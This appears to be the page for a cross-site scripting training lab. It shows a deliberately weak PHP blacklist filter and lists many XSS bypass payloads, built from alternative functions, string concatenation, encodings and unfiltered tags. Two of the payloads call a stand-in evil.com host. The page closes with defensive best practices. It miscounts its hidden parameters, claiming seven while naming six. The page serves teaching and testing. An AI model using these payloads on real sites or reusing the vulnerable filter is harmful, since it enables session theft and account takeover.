Advanced Bypass Prevention XSS Lab

Test XSS with comprehensive blacklist filtering that includes specific bypass attempt prevention

Bypass Prevention Challenge

Lab Overview

This lab demonstrates an advanced blacklist filtering approach that specifically targets common bypass techniques. The filter now includes prevention for string concatenation, HTML entities, and Unicode escapes for the "confirm" function.

Advanced Bypass Prevention: The blacklist now includes specific patterns that block common bypass techniques for the "confirm" function, making this a more challenging filter to evade.
Multiple Hidden Parameters: There are 7 hidden parameters (id, cat, page, number, page_id, categoryid) not shown in the main form. Use tools like Arjun to discover them all!
# use arjun tool to find hidden parameters: id, cat, page, number, page_id, categoryid
Parameter Security Levels:
Secure fname, lname - Uses htmlspecialchars()
Advanced Filter 7 parameters - Bypass prevention included
Bypass Prevention Specific bypass patterns are blocked
Multiple Vectors 7 parameters to test advanced techniques
Advanced Blacklist Filter Details:
Case Variations Blocked:
script Script sCript scRipt scrIpt scriPt scripT SCript SCRipt SCRIpt SCRIPt SCRIPT
Event Handlers Blocked:
ontoggle onmousemove onmouseover onfocus
Tags Blocked:
img image svg details
JavaScript Functions Blocked:
alert confirm prompt eval
Specific Bypass Patterns Blocked:
"c"+"onfirm(1)"> confirm(1)> \u0063onfirm(1)>

These patterns specifically target common bypass techniques for the "confirm" function, including string concatenation, HTML entity encoding, and Unicode escapes.

Parameter: id
Advanced bypass prevention
Parameter: cat
Advanced bypass prevention
Parameter: page
Advanced bypass prevention
Parameter: number
Advanced bypass prevention
Parameter: page_id
Advanced bypass prevention
Parameter: categoryid
Advanced bypass prevention
Secure Parameters (fname, lname):
Input: <script>alert(1)</script>
Output: &lt;script&gt;alert(1)&lt;/script&gt;
Advanced Blacklist Filtered:
Input: <script>"c"+"onfirm(1)"</script>
Output: <>""+""</>
The same advanced blacklist filter with bypass prevention is consistently applied to all 7 hidden parameters, making this a very challenging test case.
Overall Security Level: High Security

Objective: Discover all 7 hidden parameters and find creative ways to bypass the advanced blacklist filtering with specific bypass prevention to execute XSS payloads.

Backend Source Code 
if(isset($_GET["fname"]) && isset($_GET["lname"])){
    echo htmlspecialchars($_GET["fname"], ENT_QUOTES);
    echo htmlspecialchars($_GET["lname"], ENT_QUOTES);
}
elseif(isset($_GET["id"])){
    $arr = array('details','alert','confirm','prompt','eval','details',
                'ontoggle','onmousemove','onmouseover',
                'script','Script','sCript','scRipt','scrIpt','scriPt',
                'scripT','SCript','SCRipt','SCRIpt','SCRIPt','SCRIPT',
                'script','img','image','svg','onfocus',
                '"c"+"onfirm(1)">', "confirm(1)>", "\u0063onfirm(1)>");
    $re = str_replace($arr, '', $_GET['id']);
    echo $re;
}
// Same filter applied to: cat, page, number, page_id, categoryid
Test Input Forms
Visible Parameters (HTML Encoded)
This parameter uses htmlspecialchars() encoding
This parameter uses htmlspecialchars() encoding
Hidden Parameters (Advanced Bypass Prevention)
Hint: 7 parameters (id, cat, page, number, page_id, categoryid) are hidden but implemented with advanced bypass prevention.
Uses advanced bypass prevention filtering
Uses same advanced filtering
Uses same advanced filtering
Uses same advanced filtering
Uses same advanced filtering
Uses same advanced filtering
Advanced XSS Bypass Techniques for Bypass Prevention
Alternative Functions (Not Filtered):
  • <script>print()</script>
  • <script>open()</script>
  • <script>console.log(1)</script>
  • <script>fetch('http://evil.com')</script>
  • <script>XMLHttpRequest()</script>
  • <script>location.href='http://evil.com'</script>
Advanced String Manipulation:
  • <script>window['al'+'ert'](1)</script>
  • <script>this['al'+'ert'](1)</script>
  • <script>self['al'+'ert'](1)</script>
  • <script>top['al'+'ert'](1)</script>
  • <script>parent['al'+'ert'](1)</script>
Alternative Encoding Bypass:
  • <script>window['\x61lert'](1)</script>
  • <script>window['\141lert'](1)</script>
  • <script>window[`al${''}ert`](1)</script>
  • <script>window['al'['concat']('ert')](1)</script>
  • <script>window['al'.concat('ert')](1)</script>
Alternative Tags/Events (Not Filtered):
  • <iframe src=javascript:alert(1)>
  • <body onload=window['al'+'ert'](1)>
  • <marquee onstart=alert(1)></marquee>
  • <object data=javascript:alert(1)>
  • <embed src=javascript:alert(1)>
Advanced Bypass Prevention Analysis:

The current filter is very comprehensive but still has some limitations:

  • Bypass patterns: Blocks specific patterns but not all variations
  • Alternative functions: Many JavaScript functions not in the blacklist
  • String manipulation: Some concatenation patterns still work
  • Character encoding: Some encoding variations not covered
  • Global objects: Multiple ways to access functions via objects
  • Alternative tags/events: Many HTML elements not blocked
Advanced Bypass Strategies:
  • Use alternative JavaScript functions not in the blacklist
  • Use different string concatenation patterns
  • Use alternative character encoding methods
  • Use global objects to access blocked functions
  • Use HTML tags and events not in the blacklist
  • Use template literals or other string manipulation
  • Use different encoding combinations
Security Implications

Advanced bypass prevention demonstrates:

  • Even sophisticated blacklists have limitations
  • Attackers can always find creative bypass methods
  • Multiple attack vectors provide redundancy
  • New JavaScript features constantly expand attack surface
  • Browser updates may introduce new bypass techniques
  • Whitelist approaches remain the only truly secure method
  • Context-aware encoding is essential for security
Best Practices

For truly secure web applications:

  • Use context-aware output encoding instead of blacklists
  • Implement strict Content Security Policy (CSP) headers
  • Validate input based on expected data types and patterns
  • Use security libraries/frameworks for output encoding
  • Test all parameters with advanced bypass techniques
  • Apply consistent security controls across all parameters
  • Assume any blacklist can and will be bypassed
  • Regularly update security controls as new threats emerge
Real-World Security Implications
Common Advanced Filter Scenarios:
  • Enterprise WAFs: Often use sophisticated but bypassable filters
  • Security plugins: May implement advanced but incomplete protection
  • Custom frameworks: Often accumulate filters without proper testing
  • Legacy applications: May have complex but flawed filtering logic
Impact of Advanced Filter Bypass:
  • Complete application compromise despite advanced filtering
  • Session hijacking through cookie theft
  • Account takeover attacks
  • Phishing attacks from within the application
  • Data exfiltration and privacy breaches
  • Reputation damage and legal consequences
Advanced Prevention Strategies:
  • Context-aware encoding: Use proper encoding for each output context
  • Input validation: Validate based on expected data types and patterns
  • Content Security Policy: Implement strict CSP headers
  • Security testing: Test all parameters with advanced bypass techniques
  • Parameter discovery: Use tools to find all parameters during testing
  • Security headers: Implement X-XSS-Protection, X-Content-Type-Options
  • Regular updates: Keep security controls updated with new threats